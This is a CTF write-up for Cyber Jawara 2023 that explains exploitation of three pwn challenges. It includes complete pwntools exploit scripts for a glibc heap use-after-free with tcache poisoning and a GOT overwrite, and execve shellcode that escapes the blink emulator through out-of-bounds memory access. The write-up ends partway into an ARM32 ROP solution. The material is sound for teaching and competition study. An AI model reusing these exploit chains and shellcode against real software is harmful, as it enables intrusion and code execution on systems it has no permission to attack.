During this weekend, I have been competing in the Cyber Jawara CTF 2023 with my local team, Fidethus. In this writeup, I will be sharing my solutions for some of the challenges that I solved.
Pwn
migrain
Description
simple migrain manager, i mean note
137.184.6.25 17001
Initial Analysis
In this challenge, we were given a binary called migrain. Let’s disassemble the binary and take a closer look at some important functions.
main
1
2
3
4
5
6
7
8
9
10
11
void__fastcall__noreturnmain(__int64a1,char**a2,char**a3){chunk_structmain_arr;// [rsp+0h] [rbp-650h] BYREF
unsigned__int64v4;// [rsp+648h] [rbp-8h]
v4=__readfsqword(0x28u);pre_setup_17A1();puts("Cyber Jawara 2023: Break this Notes with Infinite Loop");init_main_arr_1269(&main_arr);main_func_1496(&main_arr);}
This is the main function, which will call two important functions, init_main_arr_1269 and main_func_1496.
ssize_t__fastcalladd_15FD(chunk_struct*main_arr){void*s;// [rsp+18h] [rbp-8h]
printf("Payload: ");s=(void*)alloc_chunk_130D(main_arr);memset(s,0,0x64uLL);returnread(0,s,0x64uLL);}__int64__fastcallalloc_chunk_130D(chunk_struct*main_arr){uint8_tv1;// al
char*ptr_to_data;// [rsp+18h] [rbp-8h]
ptr_to_data=(char*)malloc(8uLL);*(_QWORD*)ptr_to_data=malloc(0x64uLL);v1=main_arr->count++;main_arr->chunks[v1]=ptr_to_data;return*(_QWORD*)ptr_to_data;}
So, this add functions will allocate two chunks (0x8 and 0x64) size. The smaller chunk will be used to store the pointer to the larger chunk, and the larger chunk will be used to store our payload. There are one interesting thing that we can see here:
add doesn’t have any limit, we can add as many chunks as possible.
However, remember that main_arr->count is actually uint8, so if you add more than the uint8 limit, the count will be rest back to 0.
unsigned__int64__fastcalldestroy_1705(chunk_struct*main_arr){intidx;// [rsp+14h] [rbp-Ch] BYREF
unsigned__int64v3;// [rsp+18h] [rbp-8h]
v3=__readfsqword(0x28u);printf("Enter the index of the note to destroy: ");if(!(unsignedint)__isoc99_scanf("%d",&idx))exit(1);check_destroy_13D1((unsigned__int8*)main_arr,idx);main_arr->chunks[idx]=0LL;returnv3-__readfsqword(0x28u);}void__fastcallcheck_destroy_13D1(chunk_struct*main_arr,uint8_tidx){if(idx>=main_arr->count||!main_arr->chunks[idx]){puts("Note index out of range.");exit(1);}free(*(void**)main_arr->chunks[idx]);}
Notice that destroy function will try to free the larger chunk (which contains our input payload), then nullify the chunks[idx] array to 0. This seems okay, but this function has the main vulnerability that can be abused later. The bug is very subtle, but observe that if you send a negative value, in the destroy function, the idx will be treated as signed, but in the check_destroy, it will be treated as unsigned.
This bug means that if we try to destroy an item with negative index, our larger chunk will still get destroyed by the check_destroy function, but the chunks[idx] that is being nullified is the signed value version, which means that the chnks[unsigned(idx)] won’t be nullified, leading to Use-After-Free and Double Free.
Now that we know the vulnerability, we need to think what’s the strategy here to exploit this binary.
Solution
First, with the UAF bug, we can easily leak the heap address of the chunks, because after the chunks getting freed with negative index, we can still view the content of it, which now contains mangled pointer to the next freed chunk.
Second, observe that we basically can only allocate chunk with size 0x70. This means that if we fulfill the tcache[0x70], the next freed chunks will go to fastbin. With the Double Free vulnerability that we can trigger as well, we can do fastbin dupattack, by doing a sequence of:
free(a)
free(b)
free(a)
The above sequence will cause the fastbin linked list will be like a -> b -> a, and this can be abused later.
Stage 1: Leak heap & trigger fastbin dup
First, let’s start by creating our helper to make our life easier.
Our first target is we want to get a heap leak and doing tcache poisoning. Let’s start by allocating a lot of chunks first, so that we can use negative index to trigger UAF and Double-Free later.
1
2
3
foriinrange(200):print(i)add(p8(i)*8)
After allocating a lot of chunks, let’s try to fulfill the tcache.
1
2
3
# Fulfill tcacheforiinrange(7):destroy(i)
Let’s check in the gdb to ensure that tcache[0x70] is full.
Because tcache[0x70] is now full, every time we free a new chunk, it will go to fastbin. Now, we can try to trigger fastbin dup like what I explained before. We will need to use negative index to trigger the double-free and UAF (to leak the heap address).
As you can see, we successfully trigger it. We also get a heap leak from it. Now, the next stage is we need to leak libc address.
Stage 2: Leak LIBC address
Before trying to get a libc leak, you might be wondering why do we need to do the fastbin dup, what’s the purpose of it? To see what we can do with it, let’s try to empty the tcache first, because before we can use the freed chunk stored in the fastbin, tcache will be prioritized first by the glibc allocator.
I will explain about the fake_chunk later, but for now, let’s focus on what happen after we emptied the tcache. After we emptied the tcache, let’s check the bins state first.
Now, what will happen if we try to allocate a new chunk with this fastbins state? Let say that we try to allocate a new chunk where the value is the mangled pointer of any address in the heap. In this case, I set the value of the new chunk to the leaked_heap-0x6e80, which is 0x5613ef239300.
As you can see, the tcache[0x70] now contains 3 items, where the last item is the address that we input before during allocating a new chunk. So what happened here is that if you look in this libc _int_malloccode, there is a logic where during allocating a new chunk, it will try to iterate the fastbin and move it to the tcache.
Now, you might wonder why the tcache[0x70] contains 3 items instead of 2, because if you remember before, the fastbins have 3 items, and we allocate 1 chunk, so it should be 2. The reason is because of the fastbin dup that we trigger caused it. Here I will explained what happened in details.
Let’s start by checking through the _int_malloc below code:
staticvoid*_int_malloc(mstateav,size_tbytes){...if((unsignedlong)(nb)<=(unsignedlong)(get_max_fast())){idx=fastbin_index(nb);mfastbinptr*fb=&fastbin(av,idx);mchunkptrpp;victim=*fb;if(victim!=NULL){if(__glibc_unlikely(misaligned_chunk(victim)))malloc_printerr("malloc(): unaligned fastbin chunk detected 2");if(SINGLE_THREAD_P)*fb=REVEAL_PTR(victim->fd);elseREMOVE_FB(fb,pp,victim);if(__glibc_likely(victim!=NULL)){size_tvictim_idx=fastbin_index(chunksize(victim));if(__builtin_expect(victim_idx!=idx,0))malloc_printerr("malloc(): memory corruption (fast)");check_remalloced_chunk(av,victim,nb);#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */size_ttc_idx=csize2tidx(nb);if(tcache&&tc_idx<mp_.tcache_bins){mchunkptrtc_victim;/* While bin not empty and tcache not full, copy chunks. */while(tcache->counts[tc_idx]<mp_.tcache_count&&(tc_victim=*fb)!=NULL){if(__glibc_unlikely(misaligned_chunk(tc_victim)))malloc_printerr("malloc(): unaligned fastbin chunk detected 3");if(SINGLE_THREAD_P)*fb=REVEAL_PTR(tc_victim->fd);else{REMOVE_FB(fb,pp,tc_victim);if(__glibc_unlikely(tc_victim==NULL))break;}tcache_put(tc_victim,tc_idx);}}#endif
void*p=chunk2mem(victim);alloc_perturb(p,bytes);returnp;}}}...}
First, when we try to allocate a new 0x70 chunk, the _int_malloc will fetch the first pointer in the fastbin linked list, and later will use it as the allocated chunk.
Now, this below code tells us that it will try to get the fastbin fd pointer and then try to iterate the linked list until either the tcache is full, or the fd pointer is null.
...*fb=REVEAL_PTR(victim->fd);.../* While we're here, if we see other chunks of the same size,
stash them in the tcache. */size_ttc_idx=csize2tidx(nb);if(tcache&&tc_idx<mp_.tcache_bins){mchunkptrtc_victim;/* While bin not empty and tcache not full, copy chunks. */while(tcache->counts[tc_idx]<mp_.tcache_count&&(tc_victim=*fb)!=NULL){{if(__glibc_unlikely(misaligned_chunk(tc_victim)))malloc_printerr("malloc(): unaligned fastbin chunk detected 3");if(SINGLE_THREAD_P)*fb=REVEAL_PTR(tc_victim->fd);else{REMOVE_FB(fb,pp,tc_victim);if(__glibc_unlikely(tc_victim==NULL))break;}tcache_put(tc_victim,tc_idx);}}#endif
void*p=chunk2mem(victim);alloc_perturb(p,bytes);returnp;
Now, let’s try to imagine the scenario that happened in our case due to the fastbin dup based on the above glibc code:
First, let say that the current state of our fastbin is:
a->b->a.
When the malloc is called, the glibc will take the first pointer in the fastbin (which is a), and stored it in victim variable.
It also initialize a variable called fb which points to a.
Then, it will check whether victim->fd is null or not. Because victim is a, this means that it is not null (a->fd is b). Due to this, the glibc code will start moving the fastbin chunks to tcache. Below is the step-by-step that the glibc code did:
Get fb->fd (fb is b, so fb->fd is a) and stored it at fb (fb=a).
Move b to tcache
Now, tcache[0x70] = b, with count = 1.
And due to the move, b->fd will be cleared (NULL).
Get fb->fd (fb is a, so fb->fd is b again due to the fastbin dup that we caused before).
Move a to tcache
Now, tcache[0x70] = a-> b, with count = 2.
And due to the move, a->fd will be cleared (NULL).
Get fb->fd (fb is b, so the result is NULL due to it has been cleared before by the glibc) and stored it at fb (fb=NULL).
Move b to tcache again.
Now, tcache[0x70] = b -> a -> b, with count = 3.
And due to the move, b->fd will be cleared (NULL).
Now, because fb is NULL, the loop is stopped, and malloc will return victim (which is a).
Remember that a is actually still part of the tcache[0x70], so now we have overlapping chunk between an active chunk and tcache chunk.
This means, the value that we put during allocating this chunk will be used as the tcache pointer as well.
Before we fill the allocated chunk, the current tcache state is like b->a->b.
After we fill the allocated chunk, the tcache linked list will be changed to b->a-><our_controlled_value>.
Based on the above scenario, we basically successfully poison the tcache, and the third allocation will be placed to any address that we set.
Back to our payload, what is leaked_heap-0x6e80 (we will call it target) address? Why we use it to poison the last tcache item? The reason is because we want to allocate an overlapping chunk, and that address is located in the middle of a chunk.
If we allocate a new chunk to that position, we will be able to modify the size of the other chunks below it because with the ability of writing 0x64 data starting from that address, we can overwrite the adjacent chunks size.
This is how we will leak the libc address. We can change the overlapping 0x70 chunks size to 0x461 (or any size, as long as the chunk_address+size is pointing to other valid chunk), so that when we destroy the forged chunk, it will go to unsorted bin, and with the UAF bug, we can get a libc leak.
Another thing to notice is that the target reside on the fake_chunk that we create during emptying the tcache before, and I carefully craft the value to ensure that the tcache won’t be corrupted. If you revisit the current tcachebins:
We can see that the last item is pointing to 0x0 address. This is because I specifically set the target value to mangled pointer of 0x0 address (which in this case 0x00000005613ef239) during crafting the fake_chunk value.
Now, let’s try to allocate this chunk and changes the below 0x70 chunk size to get a libc leak.
1
2
3
4
5
6
7
8
9
10
11
12
# Use 2 tcache itemsadd(b'b')add(b'c')# Allocate our fake chunk, where this will change the size of the# below chunk to 0x460fake_chunk=b'a'*0x20fake_chunk+=p64(0)+p64(0x21)fake_chunk+=p64(leaked_heap-0x6e30)+p64(0)fake_chunk+=p64(0)+p64(0x461)fake_chunk+=p64(0)add(fake_chunk)
Checking in the gdb, we can see that the below chunk size got overwritten to 0x461.
After this, we can move to the final stage, which is controlling the RIP value.
Stage 3: RIP Control
To recap, we now have:
heap address
libc address
Now, we need to get RIP Control, so that we can spawn a shell. Remember that with the previous fastbin dup trick, we actually can create a new tcache chunk in any position. So, for the final step, we only need to repeat the trick.
First, let’s clean up the bins by allocating a lot of new chunks.
1
2
3
foriinrange(0x120):print(i)add(p64(i)*4)
Now, we repeat the same trick that we use before. But before that, what target should we aim to get RIP control?
During the competition, I decided to allocate a new tcache chunk at the libc GOT, so that I can overwrite the strlen libc GOT entry with system. I did this because we have view function, which will call printf, and based on observation in gdb, its internal call will call strlen(chunk). So, if we able to overwrite strlen libc GOT entry with system, when we call view to a chunk which contained /bin/sh string, we will spawn a shell!
# Fulfill tcacheforiinrange(7):destroy(i)destroy(neg(198))destroy(neg(197))destroy(neg(198))# Leak new heapout=u64(view(197)[:6].ljust(8,b'\x00'))leaked_heap=demangle(out)info(f'{hex(leaked_heap)= }')# Empty tcacheforiinrange(7):add(p64(i))# Tcache poisoningtarget=libc.address+0x1f6080# strlen GOT entry addressadd(p64(mangle(leaked_heap,target)))# Use 2 tcache itemsadd(b'b')add(b'/bin/sh\x00')# Poison the libc GOT entries, because this# allocation will allocate a new chunk in the target,# which is strlen GOT entry address# Remember that add function memset the chunk to 0, so we# need to ensure the other GOT entry near strlen remains the# samepayload=p64(libc.symbols['system'])payload+=p64(libc.address+(0x7f00ff976890-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff972710-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff973db0-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff976b80-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff973660-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff9719c0-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff822180-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff822190-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff8ad6d0-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff970b60-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff974190-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff8221d0-0x7f00ff800000))add(payload[:0x64])# View index -4 manuallyr.interactive()
Now, if we call view to the chunk which contains /bin/sh string, we will spawn a shell.
frompwnimportp64,u64,p32,u32frompwnimport*exe=ELF("migrain_patched")libc=ELF("./libc.so.6")# ld = ELF("./ld-2.37.so")context.binary=execontext.arch='amd64'context.encoding='latin'context.log_level='INFO'warnings.simplefilter("ignore")remote_url="137.184.6.25"# remote_url = 'localhost'remote_port=17001gdbscript='''
'''defconn():ifargs.LOCAL:r=process([exe.path])ifargs.PLT_DEBUG:# gdb.attach(r, gdbscript=gdbscript)pause()else:r=remote(remote_url,remote_port)returnrdefdemangle(val,is_heap_base=False):ifnotis_heap_base:mask=0xfff<<52whilemask:v=val&maskval^=(v>>12)mask>>=12returnvalreturnval<<12defmangle(heap_addr,val):return(heap_addr>>12)^valr=conn()# Max size = 0x64, chunk_size = 0x70defadd(payload):r.sendlineafter(b'>> ',b'1')r.sendafter(b'Payload: ',payload)defview(idx):r.sendlineafter(b'>> ',b'2')r.sendlineafter(b'Index: ',str(idx).encode())r.recvuntil(b'Data: ')out=r.recvline().strip()returnoutdefdestroy(idx):r.sendlineafter(b'>> ',b'3')r.sendlineafter(b'destroy: ',str(idx).encode())defneg(x):returnx-256# Max 0xffforiinrange(200):add(p8(i)*8)# Fulfill tcacheforiinrange(7):destroy(i)print(f'Fulfill tcache')pause()destroy(neg(198))destroy(neg(197))destroy(neg(198))print(f'fastbin dup')pause()out=u64(view(198)[:6].ljust(8,b'\x00'))leaked_heap=demangle(out)info(f'{hex(leaked_heap)= }')pause()target=leaked_heap-0x6e80info(f'{hex(target)= }')# Empty tcacheforiinrange(7):fake_chunk=b'a'*0x30fake_chunk+=p64(0)+p64(0x31)fake_chunk+=p64(mangle(target,0x0))add(fake_chunk)print('tcache empty')pause()add(p64(mangle(leaked_heap,target)))print('finished allocating a new chunk')pause()# Use 2 tcache itemsadd(b'b')add(b'c')# Allocate our fake chunk, where this will change the size of the# below chunk to 0x460fake_chunk=b'a'*0x20fake_chunk+=p64(0)+p64(0x21)fake_chunk+=p64(leaked_heap-0x6e30)+p64(0)fake_chunk+=p64(0)+p64(0x461)fake_chunk+=p64(0)add(fake_chunk)print(f'change chunk size')pause()destroy(neg(205))out=u64(view(205)[:6].ljust(8,b'\x00'))leaked_libc=outinfo(f'{hex(leaked_libc)= }')libc.address=leaked_libc-(libc.symbols['main_arena']+96)info(f'{hex(libc.address)= }')pause()# Cleanup unsorted_bin by allocating a lot of new chunksforiinrange(0x120):print(i)add(p64(i)*4)print(f'allocate a lot of new chunks')pause()# Fulfill tcacheforiinrange(7):destroy(i)destroy(neg(198))destroy(neg(197))destroy(neg(198))# Leak new heapout=u64(view(197)[:6].ljust(8,b'\x00'))leaked_heap=demangle(out)info(f'{hex(leaked_heap)= }')# Empty tcacheforiinrange(7):add(p64(i))# Tcache poisoningtarget=libc.address+0x1f6080# strlen GOT entry addressadd(p64(mangle(leaked_heap,target)))# Use 2 tcache itemsadd(b'b')add(b'/bin/sh\x00')# Poison the libc GOT entries, because this# allocation will allocate a new chunk in the target,# which is strlen GOT entry address# Remember that add function memset the chunk to 0, so we# need to ensure the other GOT entry near strlen remains the# samepayload=p64(libc.symbols['system'])payload+=p64(libc.address+(0x7f00ff976890-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff972710-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff973db0-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff976b80-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff973660-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff9719c0-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff822180-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff822190-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff8ad6d0-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff970b60-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff974190-0x7f00ff800000))payload+=p64(libc.address+(0x7f00ff8221d0-0x7f00ff800000))add(payload[:0x64])# View index -4 manuallyr.interactive()
Flag: CJ2023{95b7d2fa59d0fc9372d62b83b5250bc2}
pinkeye
Description
cant stop blinking when you got pinkeye
137.184.6.25 17003
Initial Analysis
In this challenge, we were given a binary called blink and a Dockerfile to build it locally. Taking a look in the given Dockerfile, we can see that blink is actually taken from an open source repository. Based on the information in the repository, blink is a virtual machine that can be used to emulate x86-64 programs.
I was trying to clone the repository and try to read the source code, but it has too many codes and I’m too lazy to read it. So, I decided to blackbox this challenge, by trying to create a simple ELF, put it in the blink binary, and observe its behavior using gdb.
Setup Debugging Environment
First, we need to setup the debugging environment first. During the competition, trying to debug directly in the docker helps me a lot because the memory layout in my local and docker are different. So, let’s start by modifying the given Dockerfile and docker-compose.yml, so that we can debug it easily.
For the Dockerfile, let’s remove user 1000 and install gdb and my favorite extension, pwndbg. Below is the modified Dockerfile.
Now, build this container and we will be able to debug and replicate the remote environment as close as possible. We can simply go into the container bash, then run the gdb
dockerexec-itpinkeye_blink_1/bin/bashroot@7c95c1ab911f:/app# LC_CTYPE=C.UTF-8 gdb blinkGNUgdb(Ubuntu12.1-0ubuntu1~22.04)12.1Copyright(C)2022FreeSoftwareFoundation,Inc.LicenseGPLv3+:GNUGPLversion3orlater<http://gnu.org/licenses/gpl.html>Thisisfreesoftware:youarefreetochangeandredistributeit.ThereisNOWARRANTY,totheextentpermittedbylaw.Type"show copying"and"show warranty"fordetails.ThisGDBwasconfiguredas"x86_64-linux-gnu".Type"show configuration"forconfigurationdetails.Forbugreportinginstructions,pleasesee:<https://www.gnu.org/software/gdb/bugs/>.FindtheGDBmanualandotherdocumentationresourcesonlineat:<http://www.gnu.org/software/gdb/documentation/>.Forhelp,type"help".Type"apropos word"tosearchforcommandsrelatedto"word"...pwndbg:loaded151pwndbgcommandsand39shellcommands.Typepwndbg[--shell|--all][filter]foralist.pwndbg:created$rebase,$idaGDBfunctions(canbeusedwithprint/break)Readingsymbolsfromblink...(Nodebuggingsymbolsfoundinblink)-------tipoftheday(disablewithsetshow-tipsoff)-------UseGDB's dprintf command to print all calls to given function. E.g. dprintf malloc, "malloc(%p)\n", (void*)$rdi will print all malloc callspwndbg>
Blackbox Testing
To do the blackbox testing, I started by creating this very simple assembly code:
The above assembly can be used to observe where the blink stores the emulated registers value. I put an infinite loop at the end so that the program will keep running and we can easily attach a gdb to the blink binary and observe its behavior.
We can compile the above assembly with this command:
With this script, we can easily edit the assembly directly in the script, and then running the script will compile our assembly code and send it to the local container.
Let’s try to run it and observed it via gdb. To do that, after running the above script, call ps aux to get the PID of the blink’s process that currently emulate our input.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> !ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2888 1040 ? Ss 15:47 0:00 /bin/sh -c /ynetd -p 13337 "timeout 60 python3 -u ./runner.py 2>/dev/null"
root 7 0.0 0.0 2644 1008 ? S 15:47 0:00 /ynetd -p 13337 timeout 60 python3 -u ./runner.py 2>/dev/null
root 62 0.0 0.0 5000 3848 pts/0 Ss 15:48 0:00 /bin/bash
root 74 0.1 1.0 1042960 80644 pts/0 Sl+ 15:48 0:00 gdb blink
root 92 0.0 0.0 2888 972 ? Ss 15:52 0:00 sh -c timeout 60 python3 -u ./runner.py 2>/dev/null
root 93 0.0 0.0 2796 1036 ? S 15:52 0:00 timeout 60 python3 -u ./runner.py
root 94 0.0 0.1 15292 10740 ? S 15:52 0:00 python3 -u ./runner.py
root 95 102 0.0 164312 2188 ? R 15:52 0:22 /app/blink /tmp/tmpviac9u7x
root 98 0.0 0.0 2888 1064 pts/0 S+ 15:52 0:00 sh -c ps aux
root 99 0.0 0.0 7436 1596 pts/0 R+ 15:52 0:00 ps aux
pwndbg> attach 95
Attaching to program: /app/blink, process 95
Now that it is attached, let’s try to observe it. First, we want to know where does blink store this register. We can simply search for the registers value that we set in the memory.
Checking through the above address one by one by observing the nearby areas value, we can see that the first address that we found in the heap is the location that is used by blink to store the emulated registers value.
Now, observe that among the registers, there is an interesting address with value 0x00007fd6833dfea0. Checking through the below memory mappings of blink, we can observe that the interesting value is actually adjacent to the libc base address.
Now, the question is what is that value being used for? My hypothesis during seeing that value is that it is the emulated rsp address. Let’s try to modify our assembly code by setting the r9 to rsp to confirm our hypothesis, then re-check the emulated registers value in gdb (simply repeat the above step).
It is indeed the rsp of the emulated binary! This means that we can easily get the libc base address because one of our emulated program register value is adjacent to it.
Now, we need to check, whether we can actually increase this rsp value so that it points to libc area or not, so that we can load and store the libc area value to our emulated register. If we can do this, this means that the vulnerability in the blink binary is that we have Out-of-Bound Access outside the emulated allocated area. Let’s try to prove our hypothesis by crafting a new assembly to check it.
Before crafting the assembly, at first, I thought that the offset between the emulated rsp value and the libc base address will be the same between my local container and the remote container. However, during testing it, I observe that the offset was different. This means that I couldn’t simply increase the rsp with static offset to make it points to libc.
So, in order to change our emulated rsp value to point to libc area, my strategy is to increased the rsp value by 8, and then check whether the contents has the default 8 bytes signature header of libc file or not (0x03010102464c457f). If there isn’t any crash and the contents are the same, that means:
Our rsp has points to the libc area.
We have OOB access because we can load the rsp content even though it’s already pointing to the area outside of the emulated area (which in this case the libc area).
Below is the new assembly that I craft to check it:
The above code will try to increase the rsp until its content equals to the libc first 8 bytes, because if it is equals, that means we have successfully points the emulated rsp to libc area. If the above program keep running, that means our above code works properly.
Trying to run the above code, the program kept running, which means that my hypothesis is correct, which means we indeed have OOB access to the outside of the emulated binary area. If you really want to double check it, you can simply attach the process again in the gdb, and check the emulated rsp value like what we did before, to ensure that the rsp value has changed to libc base.
One more thing to observed is that checking through the blink memory mappings, we can see that there are rwx region adjacent to the blink PIE base address.
To summarize, from our first blackbox analysis by observing the behavior through the gdb, we have two important informations:
We have OOB access abusing the emulated rsp value that is adjacent to libc.
We have rwx region.
Now, let’s try to think how to use this information to craft our solution.
Solution
Stage 1 & Stage 2: Find LIBC address & PIE Base
Now that we have OOB access to the libc area, I want to try to leak the PIE base address, because by leaking the PIE base addres, we can calculate the rwx region that we saw before, and then try to put shellcode to it. Observing through the gdb again, I noticed that libc_base-0x001d10 contains the PIE base address.
Now that we have pie base, let’s start crafting the stage_3, which is writing shellcode to the rwx region of blink.
Stage 3: Write shellcode to RWX region
Observe that the rwx region has constant offset from the pie base, which is 0x033000. I just choose a random offset, and I decided that I will put my shellcode at pie_base+0x033000+0x150. Now the question, what should be our shellcode?
Observe that in runner.py, it runs the blink with subprocess, and based on my experience, we can’t spawn a shell with it. So, I decided to craft a shellcode that will do execve("/bin/sh", ["/bin/sh", "-c", "cat /f*"]), which will directly print the flag if it is got executed. Let’s modify our script to put this shellcode to the rwx region.
frompwnimportp64,u64,p32,u32frompwnimport*importoscontext.arch='amd64'# execve("/bin/sh", ["/bin/sh", "-c", "cat /f*"])cat_flag_sc=asm('''
mov rsi, 0x68732f6e69622f
push rsi
mov rdi, rsp
mov rsi, 0x2a662f20746163
push rsi
mov r10, rsp
mov rsi, 0x632d
push rsi
mov r11, rsp
push 0x0
push r10
push r11
push rdi
mov rsi, rsp
xor rdx, rdx
mov rax, 0x3b
syscall
''')shellcode_payload=''foriinrange(0,len(cat_flag_sc),8):raw_sc_8=hex(u64(cat_flag_sc[i:i+8].ljust(8,b'\x00')))shellcode_payload+=f'''
mov r12, {raw_sc_8} mov QWORD PTR [r9], r12
add r9, 8'''sc=f'''
%use masm
_start:
nop
mov rax, 0x4141414141414141 ; just for debugging purpose, to easily find the emulated registers value
stage_1: ; find libc base address
mov r13, 0x03010102464c457f; set r13 to libc first 8 bytes
mov r12, QWORD PTR [rsp]; set r12 to rsp content
cmp r12, r13 ; compare it
je stage_2 ; if it is equals, jump to stage_2
add rsp, 8 ; else, increase the rsp by 8
jmp stage_1
stage_2: ; find pie base address
mov r9, rsp ; copy libc base to r9
sub r9, 0x001d10 ; now r9 contains pie_base
mov r9, QWORD PTR [r9] ; set r9 to r9 content, which is pie_base
stage_3: ; smuggle shellcode
add r9, 0x33150 ; set it to rwx+0x150
mov rbx, r9 ; store it in rbx, because we will need this address later
{shellcode_payload} jmp stage_4
stage_4: ; for now, set stage_4 to infinite loop first
jmp stage_4
'''# Create and compile the assemblyf=open('simple.s','wb')f.write(sc.encode())f.close()os.system('nasm -f elf64 simple.s -o simple.o && ld -o simple simple.o && chmod 755 simple')# Connect to dockerf=open('simple','rb')payload=f.read()ifargs.REMOTE:r=remote('137.184.6.25',17003)else:r=remote('localhost',17003)r.sendlineafter(b'len: ',str(len(payload)).encode())r.send(payload)r.interactive()
Basically, the stage_3 assembly will split our execve shellcode by 8, then put it in the rwx region one-by-one.
Now, we will move to the final step which is stage_4. To recap, what we have done so far:
Get libc base address.
Get PIE base address and the rwx region address.
Put shellcode in rwx region.
Stage 4: RIP Control
The final step is obvious, which is trying to control our emulated code to jump to our shellcode. My strategy is to overwrite the strlen GOT entry in the libc to our shellcode address. In order to trigger the strlen, I need to somehow trigger the __libc_message function, which will use strlen in the process. To trigger it, we need to somehow trigger malloc or free error on it.
After playing around in the gdb for a while, I found a way to do it. With the OOB access that I have, I overwrite the libc main_arena+0x10 with garbage. Then, if I try to emulate mov instruction after it, seems like blink need to do some allocation to emulate that, and because I corrupt the main_arena+0x10, it will trigger error and strlen GOT (which has been replaced to the address of our shellcode) will be called, and our shellcode will be executed.
So, to summarize, the final step (stage_4) is:
Overwrite the strlen GOT entry in libc with our execve shellcode address.
strlen GOT entry is located in libc_base+0x219098.
Overwrite the libc main_arena+0x10 value with garbage.
The starting offset of main_arena is located in libc_base+0x219c80.
Execute any mov instructions to trigger the allocation error.
Now, let’s modify our script to do the stage_4, which is my final script that I used to solve the challenge.
frompwnimportp64,u64,p32,u32frompwnimport*importoscontext.arch='amd64'# execve("/bin/sh", ["/bin/sh", "-c", "cat /f*"])cat_flag_sc=asm('''
mov rsi, 0x68732f6e69622f
push rsi
mov rdi, rsp
mov rsi, 0x2a662f20746163
push rsi
mov r10, rsp
mov rsi, 0x632d
push rsi
mov r11, rsp
push 0x0
push r10
push r11
push rdi
mov rsi, rsp
xor rdx, rdx
mov rax, 0x3b
syscall
''')shellcode_payload=''foriinrange(0,len(cat_flag_sc),8):raw_sc_8=hex(u64(cat_flag_sc[i:i+8].ljust(8,b'\x00')))shellcode_payload+=f'''
mov r12, {raw_sc_8} mov QWORD PTR [r9], r12
add r9, 8'''sc=f'''
%use masm
_start:
nop
mov rax, 0x4141414141414141 ; just for debugging purpose, to easily find the emulated registers value
stage_1: ; find libc base address
mov r13, 0x03010102464c457f; set r13 to libc first 8 bytes
mov r12, QWORD PTR [rsp]; set r12 to rsp content
cmp r12, r13 ; compare it
je stage_2 ; if it is equals, jump to stage_2
add rsp, 8 ; else, increase the rsp by 8
jmp stage_1
stage_2: ; find pie base address
mov r9, rsp ; copy libc base to r9
sub r9, 0x001d10 ; now r9 contains pie_base
mov r9, QWORD PTR [r9] ; set r9 to r9 content, which is pie_base
stage_3: ; smuggle shellcode
add r9, 0x33150 ; set it to rwx+0x150
mov rbx, r9 ; store it in rbx, because we will need this address later
{shellcode_payload} jmp stage_4
stage_4: ; overwrite strlen got + trigger malloc/free error
mov r10, rsp ; copy libc base to r10
add r10, 0x219098 ; point it to strlen GOT entry
mov QWORD PTR [r10], rbx ; change its value to our shellcode address
mov rdi, rsp ; copy libc base to rdi
; change main_arena+0x10 value to garbage (0x4141414141414141)
add rdi, 0x219c80
add rdi, 0x10
mov QWORD PTR [rdi], rax
; mov instruction will somehow trigger malloc, and due to
; we corrupt the main_arena+0x10 with garbage, it will
; trigger malloc error
mov QWORD PTR [rdi], rax
'''# Create and compile the assemblyf=open('simple.s','wb')f.write(sc.encode())f.close()os.system('nasm -f elf64 simple.s -o simple.o && ld -o simple simple.o && chmod 755 simple')# Connect to dockerf=open('simple','rb')payload=f.read()ifargs.REMOTE:r=remote('137.184.6.25',17003)else:r=remote('localhost',17003)r.sendlineafter(b'len: ',str(len(payload)).encode())r.send(payload)r.interactive()
Flag: CJ2023{80cf59c8fe2fc802b5fc532cb2a3843f}
sorearm
Description
cant pwn with my sorearm
137.184.6.25 17002
Initial Analysis
In this challenge, we were given a binary called labyrinth, which is an ARM32 binary. Let’s disassemble the binary and take a closer look.
This is ARM architecture assembly, and looking through this small assembly code, we can observe that there is a buffer overflow bug, where the stack size of the main function is 0x20, but we can read 0x100 bytes to SP+0x8. It is very straightforward that we need to perform ROP with this buffer overflow to spawn a shell, so let’s try to find some good gadgets that we can use.
Looking through the other available functions, we can see that there are two interesting functions called a and b.
Based on these two functions, we can see that the binary already provide us good gadgets that we can use, which are:
The binary already has a sequence of instructions that can call system (which is in b).
The binary already has a /bin/sh string that we can use as the parameter for the above gadget.
Using this information that we have gathered, we can start to craft our solution.
Solution
First, let’s start by calculating the offset that we need to use to control the instruction pointer. Observe that in the main function:
We can read buffer starting from sp+8
There is an extra POP {R7, PC} before the main function returns. Remember that this is a 32-bit binary, so the POP will only consume 4 bytes.
The stack size is 0x20, and based on those 2 pieces of information, we need to fill the buffer with data of length (0x20-0x8)+0x4 = 0x1c. After filling the buffer with 0x1c data, the next data that we send will overwrite the next instruction pointer.
To spawn a shell, we need to call system("/bin/sh"). In ARM32, the first parameter of the function needs to be put in the R0 register. Observe that in the b function, we already have this gadget:
1
2
MOVR0,R3;commandBLXsystem
And using the help of ROPGadget, we can see that there is a good gadget that can set the R3 value.
